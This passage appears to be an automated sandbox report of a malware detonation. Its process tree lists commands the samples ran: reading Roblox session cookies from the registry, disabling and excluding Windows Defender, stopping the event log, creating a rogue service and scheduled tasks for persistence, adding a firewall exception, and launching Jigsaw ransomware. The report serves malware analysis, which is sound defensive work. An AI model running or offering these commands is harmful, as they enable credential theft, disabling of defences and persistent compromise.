IAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                              5⤵
                                                                PID:4252
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                5⤵
                                                                  PID:4184
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    6⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    PID:1596
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                  5⤵
                                                                    PID:3204
                                                                    • C:\Windows\system32\attrib.exe
                                                                      attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                      6⤵
                                                                      • Views/modifies file attributes
                                                                      PID:5472
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                    5⤵
                                                                      PID:1796
                                                                      • C:\Windows\system32\tree.com
                                                                        tree /A /F
                                                                        6⤵
                                                                          PID:956
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                        5⤵
                                                                          PID:1592
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                          5⤵
                                                                            PID:6068
                                                                            • C:\Windows\system32\tree.com
                                                                              tree /A /F
                                                                              6⤵
                                                                                PID:4636
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                              5⤵
                                                                                PID:3076
                                                                                • C:\Windows\system32\tree.com
                                                                                  tree /A /F
                                                                                  6⤵
                                                                                    PID:2836
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                  5⤵
                                                                                    PID:4308
                                                                                    • C:\Windows\system32\tree.com
                                                                                      tree /A /F
                                                                                      6⤵
                                                                                        PID:1372
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                      5⤵
                                                                                        PID:2332
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                          6⤵
                                                                                            PID:1096
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                          5⤵
                                                                                            PID:1080
                                                                                            • C:\Windows\system32\tree.com
                                                                                              tree /A /F
                                                                                              6⤵
                                                                                                PID:5900
                                                                                        • C:\Users\Admin\AppData\Local\Temp\onedrive.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\onedrive.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3064
                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            PID:3724
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                            4⤵
                                                                                              PID:1292
                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                5⤵
                                                                                                  PID:4980
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe delete "KOPWGCIF"
                                                                                                4⤵
                                                                                                • Launches sc.exe
                                                                                                PID:992
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe create "KOPWGCIF" binpath= "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe" start= "auto"
                                                                                                4⤵
                                                                                                • Launches sc.exe
                                                                                                PID:3220
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe stop eventlog
                                                                                                4⤵
                                                                                                • Launches sc.exe
                                                                                                PID:164
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                C:\Windows\system32\sc.exe start "KOPWGCIF"
                                                                                                4⤵
                                                                                                • Launches sc.exe
                                                                                                PID:4240
                                                                                        • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
                                                                                          "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"
                                                                                          1⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1408
                                                                                          • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\H8hsp6zrMtJI2hC.exe
                                                                                            "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\H8hsp6zrMtJI2hC.exe"
                                                                                            2⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3896
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\H8hsp6zrMtJI2hC.exe"
                                                                                              3⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4424
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\VdjkHVtJ.exe"
                                                                                              3⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2188
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VdjkHVtJ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7CE7.tmp"
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:3036
                                                                                            • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\H8hsp6zrMtJI2hC.exe
                                                                                              "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\H8hsp6zrMtJI2hC.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:3300
                                                                                          • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\njSilent.exe
                                                                                            "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\njSilent.exe"
                                                                                            2⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Windows directory
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2628
                                                                                            • C:\Windows\svchost.exe
                                                                                              "C:\Windows\svchost.exe"
                                                                                              3⤵
                                                                                              • Drops startup file
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              • Drops autorun.inf file
                                                                                              • Drops file in Windows directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                              PID:5320
                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                netsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE
                                                                                                4⤵
                                                                                                • Modifies Windows Firewall
                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5492
                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                dw20.exe -x -s 1496
                                                                                                4⤵
                                                                                                  PID:6056
                                                                                            • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\msedge..exe
                                                                                              "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\msedge..exe"
                                                                                              2⤵
                                                                                              • Checks computer location settings
                                                                                              • Drops startup file
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:2852
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\msedge..exe'
                                                                                                3⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:5424
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge..exe'
                                                                                                3⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:5792
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\svchost.exe'
                                                                                                3⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:6016
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                                3⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:924
                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\svchost.exe"
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:3616
                                                                                            • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe
                                                                                              "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:1388
                                                                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe
                                                                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:3576
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe'"
                                                                                                  4⤵
                                                                                                    PID:452
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stub.exe'
                                                                                                      5⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5460
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
                                                                                                    4⤵
                                                                                                      PID:4440
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                        5⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:5448
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                      4⤵
                                                                                                        PID:3548
                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                          tasklist /FO LIST
                                                                                                          5⤵
                                                                                                          • Enumerates processes with tasklist
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:5268
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                        4⤵
                                                                                                          PID:5144
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic csproduct get uuid
                                                                                                            5⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:5416
                                                                                                    • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe
                                                                                                      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5968
                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                        "schtasks" /create /tn "Runtime broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe" /rl HIGHEST /f
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:5472
                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5648
                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                          "schtasks" /create /tn "Runtime broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft_Essentials\Runtime broker.exe" /rl HIGHEST /f
                                                                                                          4⤵
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:5616
                                                                                                    • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Jigsaw.exe
                                                                                                      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Jigsaw.exe"
                                                                                                      2⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • Adds Run key to start application
                                                                                                      PID:4264
                                                                                                      • C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Jigsaw.exe
                                                                                                        3⤵
                                                                                                        • Deletes itself
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:6020
                                                                                                    • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\SrbijaSetupHokej.exe
                                                                                                      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\SrbijaSetupHokej.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:5460
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-M1VI3.tmp\SrbijaSetupHokej.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-M1VI3.tmp\SrbijaSetupHokej.tmp" /SL5="$605B8,3939740,937984,C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\SrbijaSetupHokej.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:5272
                                                                                                        • C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe
                                                                                                          "C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:1000
                                                                                                    • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\NVIDIA.exe
                                                                                                      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\NVIDIA.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Adds Run key to start application
                                                                                                      PID:756
                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                    1⤵
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:5004
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                                                                                                    1⤵
                                                                                                    • Enumerates system info in registry
                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                    PID:4304
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x104,0x138,0x7ffcde8b46f8,0x7ffcde8b4708,0x7ffcde8b4718
                                                                                                      2⤵
                                                                                                        PID:536
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
                                                                                                        2⤵
                                                                                                          PID:4044
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
                                                                                                          2⤵
                                                                                                            PID:2256
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:4652
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:2468
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:756
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:5636
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:5644
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2436 /prefetch:2
                                                                                                                      2⤵
                                                                                                                        PID:6132
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,13038021875009097898,15960877514934748322,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
                                                                                                                        2⤵
                                                                                                                          PID:5652
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
